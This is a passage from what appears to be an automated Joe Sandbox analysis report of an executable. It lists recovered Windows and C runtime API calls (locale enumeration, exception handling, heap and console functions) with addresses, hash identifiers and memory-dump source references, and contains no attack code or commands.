                                                                                    • EnumSystemLocalesW.KERNEL32(006FB097,00000001,00000000,?,-00000050,?,006FB6C8,00000000,?,?,?,00000055,?), ref: 006FAFE3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2417226690-0
                                                                                    APIs
                                                                                      • Part of subcall function 006F22E9: GetLastError.KERNEL32(?,?,006EB788,00708A98,0000000C), ref: 006F22ED
                                                                                      • Part of subcall function 006F22E9: SetLastError.KERNEL32(00000000), ref: 006F238F
                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,006FB2B3,00000000,00000000,?), ref: 006FB545
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 3736152602-0
                                                                                    APIs
                                                                                      • Part of subcall function 006F22E9: GetLastError.KERNEL32(?,?,006EB788,00708A98,0000000C), ref: 006F22ED
                                                                                      • Part of subcall function 006F22E9: SetLastError.KERNEL32(00000000), ref: 006F238F
                                                                                    • EnumSystemLocalesW.KERNEL32(006FB2EA,00000001,?,?,-00000050,?,006FB68C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 006FB056
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2417226690-0
                                                                                    APIs
                                                                                      • Part of subcall function 006EC954: EnterCriticalSection.KERNEL32(?,?,006F1FBF,?,00708DE8,00000008,006F2185,?,?,?), ref: 006EC963
                                                                                    • EnumSystemLocalesW.KERNEL32(Function_000125D4,00000001,00708E68,0000000C,006F2A43,?), ref: 006F2619
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                    • String ID:
                                                                                    • API String ID: 1272433827-0
                                                                                    APIs
                                                                                      • Part of subcall function 006F22E9: GetLastError.KERNEL32(?,?,006EB788,00708A98,0000000C), ref: 006F22ED
                                                                                      • Part of subcall function 006F22E9: SetLastError.KERNEL32(00000000), ref: 006F238F
                                                                                    • EnumSystemLocalesW.KERNEL32(006FAE7F,00000001,?,?,?,006FB6EA,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 006FAF5D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2417226690-0
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00007C9D,006E714A), ref: 006E7C96
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: 95e8e55dba6e5cc8e41a8a789c7a6e17f1412cb1143e505b8713f24a75e5aaa1
                                                                                    • Instruction ID: 6a9a974d5d02d496272832fcbb25f4e058b3c1cda738ef451aef0b8a45bf8803
                                                                                    • Opcode Fuzzy Hash: 95e8e55dba6e5cc8e41a8a789c7a6e17f1412cb1143e505b8713f24a75e5aaa1
                                                                                    • Instruction Fuzzy Hash:
                                                                                    APIs
                                                                                    • API ID: HeapProcess
                                                                                    • String ID:
                                                                                    • API String ID: 54951025-0
                                                                                    • Opcode ID: 3b9a293b8d88e69d66bd5bd99441f98ded558ae17cd7779e793c1118bca03e50
                                                                                    • Instruction ID: 6f4c8da0bf9c7fd77f7e2f5edb001757f33621506163122adacdd787aa1911e5
                                                                                    • Opcode Fuzzy Hash: 3b9a293b8d88e69d66bd5bd99441f98ded558ae17cd7779e793c1118bca03e50
                                                                                    • Instruction Fuzzy Hash: C0A01270200100CF93004F315A0630C35985A41191700C1185004C4060DA3840104F48
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 23ebd0bd5e6436c6e2895a3075ff04c1db8902bf7fd9e8bc258d8b36fe32f176
                                                                                    • Instruction ID: cf6227e716b8cd9adb4bebf7b37cc7d4861a018361e9de7a2279298c3773e43b
                                                                                    • Opcode Fuzzy Hash: 23ebd0bd5e6436c6e2895a3075ff04c1db8902bf7fd9e8bc258d8b36fe32f176
                                                                                    • Instruction Fuzzy Hash: 83E08C3291122CEBCB14DB88C91499AF3FDEB44B40B21019AB621D3211C270DE04DBD0
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 71af946d484c22e2509226cd1cebb901a6eaaa6ba92764596b5496140318ba04
                                                                                    • Instruction ID: da90e1b12b484f397b721849ba7db5125a23bc5463a562945846416bc5678a04
                                                                                    • Opcode Fuzzy Hash: 71af946d484c22e2509226cd1cebb901a6eaaa6ba92764596b5496140318ba04
                                                                                    • Instruction Fuzzy Hash: 3EC08C3C20090846DF29A91882713F43357B391782F90048CCA1A0B743CE5F9CC2DA00
                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 006E556B
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006E5575
                                                                                    • int.LIBCPMT ref: 006E558C
                                                                                      • Part of subcall function 006E173A: std::_Lockit::_Lockit.LIBCPMT ref: 006E174B
                                                                                      • Part of subcall function 006E173A: std::_Lockit::~_Lockit.LIBCPMT ref: 006E1765
                                                                                    • codecvt.LIBCPMT ref: 006E55AF
                                                                                    • std::_Facet_Register.LIBCPMT ref: 006E55C6
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 006E55E6
                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 006E55F3
                                                                                    Strings
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                    • String ID: mEn
                                                                                    • API String ID: 2133458128-2555016830
                                                                                    • Opcode ID: 149d2e6bfc510dfb67fe9ae320a382574c60d2b7baf7ff43b4984ba21268ec69
                                                                                    • Instruction ID: eb187aeaf4c9717d601aaf713909ee695b3b54f85b3dfcef4bca8de2002c3f1c
                                                                                    • Opcode Fuzzy Hash: 149d2e6bfc510dfb67fe9ae320a382574c60d2b7baf7ff43b4984ba21268ec69
                                                                                    • Instruction Fuzzy Hash: D811DF319027949BCB44AB69D8067AD77B7AF44324F14090DE502A7381DF74AE018B88
                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 006E3E38
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006E3E42
                                                                                    • int.LIBCPMT ref: 006E3E59
                                                                                      • Part of subcall function 006E173A: std::_Lockit::_Lockit.LIBCPMT ref: 006E174B
                                                                                      • Part of subcall function 006E173A: std::_Lockit::~_Lockit.LIBCPMT ref: 006E1765
                                                                                    • codecvt.LIBCPMT ref: 006E3E7C
                                                                                    • std::_Facet_Register.LIBCPMT ref: 006E3E93
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 006E3EB3
                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 006E3EC0
                                                                                    Strings
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                    • String ID: mEn
                                                                                    • API String ID: 2133458128-2555016830
                                                                                    • Opcode ID: ea42f7742649daba7b89e7cb7c034d90d76950307095d898e0fcf617b2ed6c9a
                                                                                    • Instruction ID: 99ef95bb918b8caa49c7e351a9090f68aee1a487d6fd03f15e48f58563b7b32d
                                                                                    • Opcode Fuzzy Hash: ea42f7742649daba7b89e7cb7c034d90d76950307095d898e0fcf617b2ed6c9a
                                                                                    • Instruction Fuzzy Hash: 0611E4319023A4DBCB55EF65A80A6AEBBF7AF44310F14051DE5059B391DF74AE018788
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 006E6FDF
                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 006E6FED
                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 006E6FFE
                                                                                    • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 006E700F
                                                                                    Strings
                                                                                    • API ID: AddressProc$HandleModule
                                                                                    • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                    • API String ID: 667068680-1247241052
                                                                                    • Opcode ID: 408381f0bccd6e8e0b625dbaf0e7b3046ebd882c7406aff67bc6cf17696c7a44
                                                                                    • Instruction ID: 37aefaec9f9da1115e14e8e1c8ce00725e497bb00e455131583dfef4ded99279
                                                                                    • Opcode Fuzzy Hash: 408381f0bccd6e8e0b625dbaf0e7b3046ebd882c7406aff67bc6cf17696c7a44
                                                                                    • Instruction Fuzzy Hash: 03E02FB5E51260EBE710AB74BC0DA9A7AE4BB49771741C715F505D2190DBBC44008FA8
                                                                                    APIs
                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 006EA8A7
                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 006EA9B5
                                                                                    • _UnwindNestedFrames.LIBCMT ref: 006EAB07
                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 006EAB22
                                                                                    Strings
                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                    • String ID: csm$csm$csm
                                                                                    • API String ID: 2751267872-393685449
                                                                                    • Opcode ID: 4aa11110f662477c5e85e4c46ded4d163fbff95cfcf31be0ab99e7d094ea0f96
                                                                                    • Instruction ID: cce6cf1e617745f4c7ea961280a7583d2bad9492df638487869082ecb59e9988
                                                                                    • Opcode Fuzzy Hash: 4aa11110f662477c5e85e4c46ded4d163fbff95cfcf31be0ab99e7d094ea0f96
                                                                                    • Instruction Fuzzy Hash: D5B18D71802389EFCF15DFD6C9819AEBBB6FF14310B15416AE8016B352D730EA52CB96
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006E353E
                                                                                    • int.LIBCPMT ref: 006E3551
                                                                                      • Part of subcall function 006E173A: std::_Lockit::_Lockit.LIBCPMT ref: 006E174B
                                                                                      • Part of subcall function 006E173A: std::_Lockit::~_Lockit.LIBCPMT ref: 006E1765
                                                                                    • std::_Facet_Register.LIBCPMT ref: 006E3584
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 006E359A
                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 006E35A5
                                                                                    Strings
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                    • String ID: Z'n$Z'n
                                                                                    • API String ID: 2081738530-416741392
                                                                                    • Opcode ID: 853ca2c60e9b6b3744b5435acd3a938d6eaf80819bb4aa7be09f1306c9b34d1d
                                                                                    • Instruction ID: 23be819c531f7087879f368e3cffd0e86a679341ca1d0c9bc6ccb475fff321c7
                                                                                    • Opcode Fuzzy Hash: 853ca2c60e9b6b3744b5435acd3a938d6eaf80819bb4aa7be09f1306c9b34d1d
                                                                                    • Instruction Fuzzy Hash: 3A014772902364ABCB04AB56C80A8ED776ADF80720F10010DF8119B391DB309F018798
                                                                                    APIs
                                                                                    • API ID: __freea$__alloca_probe_16$Info
                                                                                    • String ID:
                                                                                    • API String ID: 127012223-0
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 006E6E06
                                                                                    • __alloca_probe_16.LIBCMT ref: 006E6E32
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 006E6E71
                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006E6E8E
                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 006E6ECD
                                                                                    • __alloca_probe_16.LIBCMT ref: 006E6EEA
                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006E6F2C
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 006E6F4F
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                    • String ID:
                                                                                    • API String ID: 2040435927-0
                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 006E51F3
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006E51FE
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 006E526C
                                                                                      • Part of subcall function 006E534F: std::locale::_Locimp::_Locimp.LIBCPMT ref: 006E5367
                                                                                    • std::locale::_Setgloballocale.LIBCPMT ref: 006E5219
                                                                                    • _Yarn.LIBCPMT ref: 006E522F
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                    • String ID: mEn
                                                                                    • API String ID: 1088826258-2555016830
                                                                                    APIs
                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,A418D8C2,?,?,00000000,006FF147,000000FF,?,006EFFF2,00000002,?,006EFFC6,006ECA0D), ref: 006F0097
                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006F00A9
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,006FF147,000000FF,?,006EFFF2,00000002,?,006EFFC6,006ECA0D), ref: 006F00CB
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mEn$mscoree.dll
                                                                                    • API String ID: 4061214504-3563252196
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,006EA411,006E89DA,006E7CE1), ref: 006EA428
                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006EA436
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006EA44F
                                                                                    • SetLastError.KERNEL32(00000000,006EA411,006E89DA,006E7CE1), ref: 006EA4A1
                                                                                    Similarity
                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                    • String ID:
                                                                                    • API String ID: 3852720340-0
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: AdjustPointer
                                                                                    • String ID: mEn
                                                                                    • API String ID: 1740715915-2555016830
                                                                                    APIs
                                                                                    • __alloca_probe_16.LIBCMT ref: 006F6DB8
                                                                                    • __alloca_probe_16.LIBCMT ref: 006F6E79
                                                                                    • __freea.LIBCMT ref: 006F6EE0
                                                                                      • Part of subcall function 006F5F8A: RtlAllocateHeap.NTDLL(00000000,006F89B1,?,?,006F89B1,00000220,?,00000000,?), ref: 006F5FBC
                                                                                    • __freea.LIBCMT ref: 006F6EF5
                                                                                    • __freea.LIBCMT ref: 006F6F05
                                                                                    Similarity
                                                                                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1423051803-0
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006E2638
                                                                                    • int.LIBCPMT ref: 006E264B
                                                                                      • Part of subcall function 006E173A: std::_Lockit::_Lockit.LIBCPMT ref: 006E174B
                                                                                      • Part of subcall function 006E173A: std::_Lockit::~_Lockit.LIBCPMT ref: 006E1765
                                                                                    • std::_Facet_Register.LIBCPMT ref: 006E267E
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 006E2694
                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 006E269F
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                    • String ID:
                                                                                    • API String ID: 2081738530-0
                                                                                    APIs
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 006EA25F
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 006EA313
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                    • String ID: csm$mEn
                                                                                    • API String ID: 3480331319-3856839041
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,006EB513,00000000,00000001,0073DEDC,?,?,?,006EB6B6,00000004,InitializeCriticalSectionEx,00701DA8,InitializeCriticalSectionEx), ref: 006EB56F
                                                                                    • GetLastError.KERNEL32(?,006EB513,00000000,00000001,0073DEDC,?,?,?,006EB6B6,00000004,InitializeCriticalSectionEx,00701DA8,InitializeCriticalSectionEx,00000000,?,006EB46D), ref: 006EB579
                                                                                    • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,006EA383), ref: 006EB5A1
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                    • String ID: api-ms-
                                                                                    • API String ID: 3177248105-2084034818
                                                                                    APIs
                                                                                    • GetConsoleOutputCP.KERNEL32(A418D8C2,00000000,00000000,006ECCE4), ref: 006F3A07
                                                                                      • Part of subcall function 006F7AA2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,006F6ED6,?,00000000,-00000008), ref: 006F7B4E
                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 006F3C62
                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 006F3CAA
                                                                                    • GetLastError.KERNEL32 ref: 006F3D4D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                    • String ID:
                                                                                    • API String ID: 2112829910-0
                                                                                    APIs
                                                                                      • Part of subcall function 006F7AA2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,006F6ED6,?,00000000,-00000008), ref: 006F7B4E
                                                                                    • GetLastError.KERNEL32 ref: 006F7F22
                                                                                    • __dosmaperr.LIBCMT ref: 006F7F29
                                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 006F7F63
                                                                                    • __dosmaperr.LIBCMT ref: 006F7F6A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 1913693674-0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    APIs
                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 006F8E5C
                                                                                      • Part of subcall function 006F7AA2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,006F6ED6,?,00000000,-00000008), ref: 006F7B4E
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006F8E94
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006F8EB4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 158306478-0
                                                                                    APIs
                                                                                    • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,006FC067,00000000,00000001,00000000,006ECCE4,?,006F3DA1,006ECCE4,00000000,00000000), ref: 006FD26C
                                                                                    • GetLastError.KERNEL32(?,006FC067,00000000,00000001,00000000,006ECCE4,?,006F3DA1,006ECCE4,00000000,00000000,006ECCE4,006ECCE4,?,006F4328,?), ref: 006FD278
                                                                                      • Part of subcall function 006FD23E: CloseHandle.KERNEL32(FFFFFFFE,006FD288,?,006FC067,00000000,00000001,00000000,006ECCE4,?,006F3DA1,006ECCE4,00000000,00000000,006ECCE4,006ECCE4), ref: 006FD24E
                                                                                    • ___initconout.LIBCMT ref: 006FD288
                                                                                      • Part of subcall function 006FD200: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006FD22F,006FC054,006ECCE4,?,006F3DA1,006ECCE4,00000000,00000000,006ECCE4), ref: 006FD213
                                                                                    • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,006FC067,00000000,00000001,00000000,006ECCE4,?,006F3DA1,006ECCE4,00000000,00000000,006ECCE4), ref: 006FD29D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                    • String ID:
                                                                                    • API String ID: 2744216297-0
                                                                                    APIs
                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,006FDC7F), ref: 006FE32C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DecodePointer
                                                                                    • String ID: ,6p$mEn
                                                                                    • API String ID: 3527080286-4141555692
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Fputc
                                                                                    • String ID: mEn
                                                                                    • API String ID: 3078413507-2555016830
                                                                                    APIs
                                                                                    • EncodePointer.KERNEL32(00000000,?), ref: 006EAB52
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: EncodePointer
                                                                                    • String ID: MOC$RCC
                                                                                    • API String ID: 2118026453-2084237596
                                                                                    APIs
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 006E1D36
                                                                                      • Part of subcall function 006E3D97: std::invalid_argument::invalid_argument.LIBCONCRT ref: 006E3DA3
                                                                                    • _Deallocate.LIBCONCRT ref: 006E1DD3
                                                                                    Strings
                                                                                    Memory Dump Source
